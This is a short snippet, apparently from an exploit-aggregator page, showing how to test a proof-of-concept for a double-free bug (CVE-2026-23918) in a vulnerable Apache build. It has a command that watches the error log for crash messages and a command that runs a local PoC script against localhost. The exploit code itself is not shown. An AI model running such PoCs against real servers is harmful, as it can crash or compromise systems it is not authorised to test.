## https://sploitus.com/exploit?id=92FEC48F-49A0-52E6-916C-4B94BEE6A1BC
# Watch for the double-free in real-time
sudo tail -f /usr/local/apache2-vuln/logs/error_log | grep -i "double free\|exit signal"
# Run the PoC
python3 ~/cve-2026-23918-poc.py localhost 9443